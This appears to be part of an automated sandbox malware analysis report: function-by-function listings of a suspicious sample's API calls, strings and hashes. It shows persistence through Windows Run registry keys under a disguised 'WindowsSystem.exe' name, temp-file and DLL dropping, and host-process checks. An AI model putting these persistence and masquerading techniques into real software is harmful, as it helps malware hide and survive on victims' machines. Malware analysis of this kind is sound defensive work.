                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait__snwprintf
                                                                                                            • String ID: %s\%s$UNLOAD.TXT${DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 1432346771-3124979191
                                                                                                            • Opcode ID: cdf08558ca2e2a398a3f59c7ad4b5e171d3263b5c68544596283d6b5fe657330
                                                                                                            • Instruction ID: a8523a8d6c7bec30fa58a0da0e63b9072a70a6a84669748ecbf43e120b85ddaa
                                                                                                            • Opcode Fuzzy Hash: cdf08558ca2e2a398a3f59c7ad4b5e171d3263b5c68544596283d6b5fe657330
                                                                                                            • Instruction Fuzzy Hash: F2316175E01304FBDB369BA4DC5EBADBB78EB08711F108658F615A62D0D7789A80CB50
                                                                                                            Function 00312560 Relevance: 29.8, APIs: 10, Strings: 7, Instructions: 84registrymemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031258B
                                                                                                            • wnsprintfW.SHLWAPI ref: 003125BA
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 003125DD
                                                                                                            • RegSetValueExW.ADVAPI32(?,00376FC8,00000000,00000001,?,?), ref: 00312600
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00316AED), ref: 0031260A
                                                                                                            • RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00312627
                                                                                                            • RegSetValueExW.ADVAPI32(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},00000000,00000001,?,?), ref: 0031264A
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00316AED), ref: 00312654
                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00316AED), ref: 0031265E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312668
                                                                                                            Strings
                                                                                                            • j1, xrefs: 00312566, 00312569
                                                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 00312641
                                                                                                            • {34E50511-FBB8-42F8-98A2-2629192A03A0}, xrefs: 0031259E
                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0031261D
                                                                                                            • WindowsSystem.exe, xrefs: 003125A3
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 003125D3
                                                                                                            • %s%s %s, xrefs: 003125AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Freelstrlen$AllocCloseOpenValue$FolderKnownPathTask__snwprintfwnsprintf
                                                                                                            • String ID: %s%s %s$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}${AB1F3E47-AEF1-400E-A108-233A046C3A34}$j1
                                                                                                            • API String ID: 3858463887-2459602844
                                                                                                            • Opcode ID: 07c87a2a4c96ef75ea048bcb13fdede030e2aad7ae317b99063c2765dd969c22
                                                                                                            • Instruction ID: 06562f092fd24b01d81b039a50d6dedcafded6108ec1dd7d3463c07c33964a8d
                                                                                                            • Opcode Fuzzy Hash: 07c87a2a4c96ef75ea048bcb13fdede030e2aad7ae317b99063c2765dd969c22
                                                                                                            • Instruction Fuzzy Hash: 40318F75A00209BFDB36DBA0CC89FEEB77DAF48704F008418F609A6190D6B5A981CB20
                                                                                                            Function 00312710 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 117memoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0031271C
                                                                                                            • _memmove.LIBCMT ref: 0031273B
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00312788
                                                                                                            • GetTempPathW.KERNEL32(00007FFF,00000000), ref: 003127A4
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003127B9
                                                                                                            • __snwprintf.LIBCMT ref: 003127E2
                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000002,00000000,00000000), ref: 003127FD
                                                                                                            • WriteFile.KERNEL32(000000FF,00000000,00000000,?,00000000), ref: 0031281E
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00312830
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031283A
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00312849
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00312853
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031285D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312867
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00312871
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$AllocFile$CloseHandle$CreateDeletePathTempWrite__snwprintf_memmove
                                                                                                            • String ID: %s%s
                                                                                                            • API String ID: 2323091063-3252725368
                                                                                                            • Opcode ID: 5a78b0c2d710ff5f298abbfcbeaf2f378b8259aa1a6bcb38cbe4d9e665f2c6cd
                                                                                                            • Instruction ID: 30eef6663aa972e2527e3a99cc9591c0e6486cd4a375569ce6c7c7bada6926ce
                                                                                                            • Opcode Fuzzy Hash: 5a78b0c2d710ff5f298abbfcbeaf2f378b8259aa1a6bcb38cbe4d9e665f2c6cd
                                                                                                            • Instruction Fuzzy Hash: 37410B75A00209EBDB25DFA4DC89FEFBBB9BF48700F104558FA15A7290C7749A90CB50
                                                                                                            Function 00309400 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 132filememorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00306D26,?,00306D8A,00000000,00000000,?), ref: 00309416
                                                                                                            • _memmove.LIBCMT ref: 00309435
                                                                                                            • lstrcpyW.KERNEL32(?,00000000,00000000,00000000), ref: 003094FF
                                                                                                            • StrStrIW.SHLWAPI(?,.DLL), ref: 00309511
                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 0030953C
                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00309569
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00309581
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030958B
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0030959F
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003095C9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$CloseFileFreeHandle$AllocCreateWrite_memmovelstrcpy
                                                                                                            • String ID: .DLL$rT=
                                                                                                            • API String ID: 1779380834-3072103379
                                                                                                            • Opcode ID: 12369dfa268be29e3c2031a04437f1a397c939c0080951abf351c3dcde6f4dcb
                                                                                                            • Instruction ID: 211d48cd77ae9956f9cae649d7792657456a432893814aed7be183cddc7b320c
                                                                                                            • Opcode Fuzzy Hash: 12369dfa268be29e3c2031a04437f1a397c939c0080951abf351c3dcde6f4dcb
                                                                                                            • Instruction Fuzzy Hash: A9514C75A01208DBCB26CF94DC88FDDB7B9EB4C300F108599F649A7291C6709AC0DF50
                                                                                                            Function 00302250 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 130processmemorysynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00302314
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00302328
                                                                                                            • _memset.LIBCMT ref: 0030234B
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0030239E
                                                                                                            • __snwprintf.LIBCMT ref: 003023D1
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 00302401
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00302415
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00302422
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0030242F
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030243C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00302449
                                                                                                              • Part of subcall function 003179F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,003168E6,003347E8), ref: 00317A19
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00302467
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030247D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$CloseHandle_memset$AllocCreateDirectoryObjectProcessSingleSystemWait__snwprintflstrlen
                                                                                                            • String ID: D
                                                                                                            • API String ID: 1415010105-2746444292
                                                                                                            • Opcode ID: c42b6d23f3db09648d3f6eca40499a0749264de2e29b9c1bba960c7cec6e1ae5
                                                                                                            • Instruction ID: 2b6bd17dd25f0e0c0a8fca215ff3b69645712b2a6aecb72e83a7b45b73d259f2
                                                                                                            • Opcode Fuzzy Hash: c42b6d23f3db09648d3f6eca40499a0749264de2e29b9c1bba960c7cec6e1ae5
                                                                                                            • Instruction Fuzzy Hash: 125159B0A122289FEB26DF54DD58BDABB7CAF49304F0045D8E60DAA280D7B45BC4CF51
                                                                                                            Function 0030BB80 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 73memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,0031BC7D), ref: 0030BB8D
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BBA7
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BBC1
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 0030BBDF
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00000000,00007FFF), ref: 0030BBF2
                                                                                                            • __snwprintf.LIBCMT ref: 0030BC0E
                                                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0030BC1E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BC2C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BC36
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BC40
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BC51
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BC5B
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BC65
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameWindows__snwprintflstrcmpi
                                                                                                            • String ID: %s\explorer.exe
                                                                                                            • API String ID: 150365659-2893622748
                                                                                                            • Opcode ID: 4e139395239ee232324b0d17f62fa7f1557a7c5a38e88421ecf0792e114c9cc1
                                                                                                            • Instruction ID: 19c399f30778e6f4c8251782f1ba54bbcf48eba5b1d0ebbdf9f0f1d76facbe2d
                                                                                                            • Opcode Fuzzy Hash: 4e139395239ee232324b0d17f62fa7f1557a7c5a38e88421ecf0792e114c9cc1
                                                                                                            • Instruction Fuzzy Hash: 62215174A00204FBE725EBA4DD59EADBB7DAF48701F104478FA0AE62D0CB749A80CB10
                                                                                                            Function 0030BC80 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 73memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,0031BCBF), ref: 0030BC8D
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BCA7
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BCC1
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 0030BCDF
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 0030BCF2
                                                                                                            • __snwprintf.LIBCMT ref: 0030BD0E
                                                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0030BD1E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BD2C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BD36
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BD40
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BD51
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BD5B
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BD65
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem__snwprintflstrcmpi
                                                                                                            • String ID: %s\svchost.exe
                                                                                                            • API String ID: 4247545968-1955667316
                                                                                                            • Opcode ID: 7c3487dea402e997d56ee763bbe3174e9227b58988d75116c82ddac198629d71
                                                                                                            • Instruction ID: e178c9adfaa52fd5edb13830337e0bed4c61d9b02465bbe2affb64adcc7cec5e
                                                                                                            • Opcode Fuzzy Hash: 7c3487dea402e997d56ee763bbe3174e9227b58988d75116c82ddac198629d71
                                                                                                            • Instruction Fuzzy Hash: 97213174A10205FBD735AFA4DC59EADFB79AF48701F104578FA09EA2D0DB749A80CB10
                                                                                                            Function 0030BD80 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 73memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,0031BD01), ref: 0030BD8D
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BDA7
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BDC1
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 0030BDDF
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 0030BDF2
                                                                                                            • __snwprintf.LIBCMT ref: 0030BE0E
                                                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0030BE1E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BE2C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BE36
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BE40
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BE51
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BE5B
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BE65
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem__snwprintflstrcmpi
                                                                                                            • String ID: %s\cmd.exe
                                                                                                            • API String ID: 4247545968-923833829
                                                                                                            • Opcode ID: b8be6886c4009e7c6ad66404fbcece0157b17d7158f623e6d4745776ce1df5e0
                                                                                                            • Instruction ID: d0ca6d66a1f758fc097e8b00da462af36db7dc37c2f43f23ec1fb9dac34aafb3
                                                                                                            • Opcode Fuzzy Hash: b8be6886c4009e7c6ad66404fbcece0157b17d7158f623e6d4745776ce1df5e0
                                                                                                            • Instruction Fuzzy Hash: C6213175E00309FBDB169BA4ED99FAEB7BAAF08701F104564F705A62D0DB749A04CB10
                                                                                                            Function 00310500 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 404memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 00310607
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00310C5A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00310C70
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00310C8D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$AllocVirtual
                                                                                                            • String ID: @$_DllMain@12
                                                                                                            • API String ID: 631462101-1064695914
                                                                                                            • Opcode ID: 16215be5b028f2ed0e2e31a8716c17c423ce6fb1e78c8cd8927c6f6ba0a2eb83
                                                                                                            • Instruction ID: df635448c5bb6124f43bdad6110c7d8d3edde2248bfcf27b77160b6d46e51bee
                                                                                                            • Opcode Fuzzy Hash: 16215be5b028f2ed0e2e31a8716c17c423ce6fb1e78c8cd8927c6f6ba0a2eb83
                                                                                                            • Instruction Fuzzy Hash: 18228C74A05228CBDB2ACF18C994BEAB7B1BF89305F1081D9D509AB351D775AEC5CF80
                                                                                                            Function 003179F0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 176stringmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,003168E6,003347E8), ref: 00317A19
                                                                                                            • _memmove.LIBCMT ref: 00317A48
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00317A6C
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00317A7F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$AllocLocal_memmove
                                                                                                            • String ID: G3$G3$G3$h1G3
                                                                                                            • API String ID: 39496755-3426192093
